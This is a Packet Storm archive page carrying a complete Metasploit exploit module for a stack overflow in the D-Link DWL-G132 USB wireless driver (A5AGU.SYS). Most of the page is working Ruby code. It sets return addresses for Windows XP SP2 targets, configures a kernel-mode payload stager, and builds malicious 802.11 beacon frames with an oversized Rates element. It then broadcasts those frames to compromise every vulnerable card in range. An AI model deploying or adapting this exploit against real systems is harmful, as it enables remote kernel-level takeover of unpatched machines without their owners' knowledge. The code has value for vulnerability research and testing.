what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

dlink_wifi_rates.rb.txt

dlink_wifi_rates.rb.txt
Posted Nov 14, 2006
Authored by Matt Miller, H D Moore, Johnny Cache, LMH | Site projects.info-pull.com

This Metasploit module exploits a stack overflow in the A5AGU.SYS driver provided with the D-Link DWL-G132 USB wireless adapter. This stack overflow allows remote code execution in kernel mode. The stack overflow is triggered when a 802.11 Beacon frame is received that contains a long Rates information element. This exploit was tested with version 1.0.1.41 of the A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340 adapter and appear to resolve this flaw, but D-Link does not offer an updated driver for the DWL-G132. Since this vulnerability is exploited via beacon frames, all cards within range of the attack will be affected. The tested adapter used a MAC address in the range of 00:11:95:f2:XX:XX.

tags | exploit, remote, overflow, kernel, code execution
SHA-256 | 5245f37a2a49581c658dd9bdd9e766576bf78b633852da860acdc8bc666fa469

dlink_wifi_rates.rb.txt

Change Mirror Download
require 'msf/core'

module Msf

class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remote

include Exploit::Lorcon
include Exploit::KernelMode

def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link DWL-G132 Wireless Driver Beacon Rates Overflow',
'Description' => %q{
This module exploits a stack overflow in the A5AGU.SYS driver provided
with the D-Link DWL-G132 USB wireless adapter. This stack overflow
allows remote code execution in kernel mode. The stack overflow is triggered
when a 802.11 Beacon frame is received that contains a long Rates information
element. This exploit was tested with version 1.0.1.41 of the
A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer
versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340
adapter and appear to resolve this flaw, but D-Link does not offer an updated
driver for the DWL-G132. Since this vulnerability is exploited via beacon frames,
all cards within range of the attack will be affected. The tested adapter used
a MAC address in the range of 00:11:95:f2:XX:XX.

Vulnerable clients will need to have their card in a non-associated state
for this exploit to work. The easiest way to reproduce this bug is by starting
the exploit and then accessing the Windows wireless network browser and
forcing it to refresh.

D-Link was NOT contacted about this flaw. A search of the SecurityFocus
database indicates that D-Link has not provided an official patch or
solution for any of the seven flaws listed at the time of writing:
(BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689).

This module depends on the Lorcon library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon documentation
(external/ruby-lorcon/README) for more information.
},

'Authors' =>
[
'hdm', # discovery, exploit dev
'skape', # windows kernel ninjitsu
'Johnny Cache <johnnycsh [at] 80211mercenary.net>' # making all of this possible
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 3583 $',
'References' =>
[
['URL', 'ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip'],
],
'Privileged' => true,

'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},

'Payload' =>
{
# Its a beautiful day in the neighborhood...
'Space' => 1000
},
'Platform' => 'win',
'Targets' =>
[
# Windows XP SP2 with the latest updates
# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
[ 'Windows XP SP2 (5.1.2600.2122), A5AGU.sys 1.0.1.41',
{
'Ret' => 0x8066662c, # jmp edi
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
'Recovery' => 'idlethread_restart',
'KiIdleLoopAddress' => 0x804dbb27,
}
}
}
],

# Windows XP SP2 install media, no patches
# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
[ 'Windows XP SP2 (5.1.2600.2180), A5AGU.sys 1.0.1.41',
{
'Ret' => 0x804f16eb, # jmp edi
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
'Recovery' => 'idlethread_restart',
'KiIdleLoopAddress' => 0x804dc0c7,
}
}
}
]
],


'DefaultTarget' => 0
))

register_options(
[
OptString.new('ADDR_DST', [ true, "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']),
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60])
], self.class)
end

def exploit
open_wifi

stime = Time.now.to_i
rtime = datastore['RUNTIME'].to_i
count = 0

print_status("Sending exploit beacons for #{datastore['RUNTIME']} seconds...")
while (stime + rtime > Time.now.to_i)
wifi.write(create_beacon)
select(nil, nil, nil, 0.10) if (count % 100 == 0)

count += 1

# Exit if we get a session
break if session_created?
end

print_status("Completed sending beacons.")
end


#
# The long rates field bug can be triggered three different ways (at least):
# 1) Send a single rates IE with valid rates up front and long data
# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data (thanks gil!)
# 3) Send two IE rates fields, with the second one containing the long data (this exploit)
#
def create_beacon

ssid = Rex::Text.rand_text_alphanumeric(6)
bssid = ("\x00" * 2) + Rex::Text.rand_text(4)
src = ("\x90" * 4) + "\xeb\x2b"
seq = [rand(255)].pack('n')

buff = Rex::Text.rand_text(75)
buff[0, 2] = "\xeb\x49"
buff[71, 4] = [target.ret].pack('V')

frame =
"\x80" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
"\xff\xff\xff\xff\xff\xff" + # dst
src + # src
bssid + # bssid
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
"\x64\x00" + # beacon interval
"\x00\x05" + # capability flags

# ssid tag
"\x00" + ssid.length.chr + ssid +

# supported rates
"\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +

# current channel
"\x03" + "\x01" + channel.chr +

# eip was his name-o
"\x01" + buff.length.chr + buff +

payload.encoded

return frame
end

end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close